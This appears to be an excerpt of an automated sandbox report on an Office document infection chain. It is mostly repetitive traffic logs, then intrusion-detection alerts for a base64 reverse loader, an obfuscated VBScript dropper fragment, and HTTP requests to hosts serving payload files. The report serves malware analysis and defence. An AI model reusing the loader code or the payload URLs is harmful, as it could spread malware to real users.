      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 141.98.10.88:80 -> 192.168.2.22:49167
      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.22:49166
      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
      Source: unknownDNS query: name: paste.ee
      Source: unknownDNS query: name: paste.ee
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDropped file: OxYOAjpEUPuNrUcilh = JOIn(OxYOAjpEUPuNrUcilh, "") : sET tiHCaEMySARSZBLGIL = crEAtEoBjecT(aDKRcXsPFoLUYvOAft) : tiHCaEMySARSZBLGIL.TypE = 1 : tiHCaEMySARSZBLGIL.OpEn : wiTh CReatEObjECt(aDKRcXsPFoLUYvOAft) : .TyPE = vNbNJBlWjisPcvfhxo : .oPen : .WRItetext OxYOAjpEUPuNrUcilh : .pOSItiOn = vNbNJBlWjisPcvfhxo : .CoPYTo tiHCaEMySARSZBLGIL : .cloSe : eND WITh : tiHCaEMySARSZBLGIL.sAvETOFiLE EMHpUtqUDiLCnBLAKx, vNbNJBlWjisPcvfhxo : tiHCaEMySARSZBLGIL.clOSe : sET tiHCaEMySARSZBLGIL = NOtHInG : ENd sub : fUnCTiOn MRvtVKYyAsWdzzzLPT ( bYVaL jJyVdoatByXvluBMkO ) : DiM xjGCBaieFPXyseJMwB , HfUHVQBNUlxLZjYmun : SEt xjGCBaieFPXyseJMwB = CReATeObjEcT ( "msxml2.doMdOCumeNt.3.0" ) : SeT HfUHVQBNUlxLZjYmun = xjGCBaieFPXyseJMwB.CrEatEelemenT ( "Base64" ) : HfUHVQBNUlxLZjYmun.DatATyPE = "bIn.base64" : HfUHVQBNUlxLZjYmun.TexT = jJyVdoatByXvluBMkO : MRvtVKYyAsWdzzzLPT = BovGaVucOKdslAzSOg ( HfUHVQBNUlxLZjYmun.NoDEtypEdvalue ) : set HfUHVQBNUlxLZjYmun = NOTHinG : set xjGCBaieFPXyseJMwB = nothing : ENd FuncTIOnJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDropped file: OxYOAjpEUPuNrUcilh = JOIn(OxYOAjpEUPuNrUcilh, "") : sET tiHCaEMySARSZBLGIL = crEAtEoBjecT(aDKRcXsPFoLUYvOAft) : tiHCaEMySARSZBLGIL.TypE = 1 : tiHCaEMySARSZBLGIL.OpEn : wiTh CReatEObjECt(aDKRcXsPFoLUYvOAft) : .TyPE = vNbNJBlWjisPcvfhxo : .oPen : .WRItetext OxYOAjpEUPuNrUcilh : .pOSItiOn = vNbNJBlWjisPcvfhxo : .CoPYTo tiHCaEMySARSZBLGIL : .cloSe : eND WITh : tiHCaEMySARSZBLGIL.sAvETOFiLE EMHpUtqUDiLCnBLAKx, vNbNJBlWjisPcvfhxo : tiHCaEMySARSZBLGIL.clOSe : sET tiHCaEMySARSZBLGIL = NOtHInG : ENd sub : fUnCTiOn MRvtVKYyAsWdzzzLPT ( bYVaL jJyVdoatByXvluBMkO ) : DiM xjGCBaieFPXyseJMwB , HfUHVQBNUlxLZjYmun : SEt xjGCBaieFPXyseJMwB = CReATeObjEcT ( "msxml2.doMdOCumeNt.3.0" ) : SeT HfUHVQBNUlxLZjYmun = xjGCBaieFPXyseJMwB.CrEatEelemenT ( "Base64" ) : HfUHVQBNUlxLZjYmun.DatATyPE = "bIn.base64" : HfUHVQBNUlxLZjYmun.TexT = jJyVdoatByXvluBMkO : MRvtVKYyAsWdzzzLPT = BovGaVucOKdslAzSOg ( HfUHVQBNUlxLZjYmun.NoDEtypEdvalue ) : set HfUHVQBNUlxLZjYmun = NOTHinG : set xjGCBaieFPXyseJMwB = nothing : ENd FuncTIOnJump to dropped file
      Source: Yara matchFile source: 9.2.powershell.exe.65e6590.1.raw.unpack, type: UNPACKEDPE
      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /olk/SWSSL.txt HTTP/1.1Host: pus.rollerswpush.euConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
      Source: Joe Sandbox ViewASN Name: HOSTBALTICLT HOSTBALTICLT
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: global trafficHTTP traffic detected: GET /d/qImtr HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
      Source: global trafficHTTP traffic detected: GET /tes/jukhccby.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sbv.pushswroller.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d/qImtr HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49166 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C827C2B0-2C23-4443-8425-29567D88EE81}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /d/qImtr HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tes/jukhccby.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sbv.pushswroller.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d/qImtr HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
      Source: global trafficHTTP traffic detected: GET /olk/SWSSL.txt HTTP/1.1Host: pus.rollerswpush.euConnection: Keep-Alive
      Source: wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: sbv.pushswroller.eu
      Source: global trafficDNS traffic detected: DNS query: paste.ee
      Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
      Source: global trafficDNS traffic detected: DNS query: pus.rollerswpush.eu
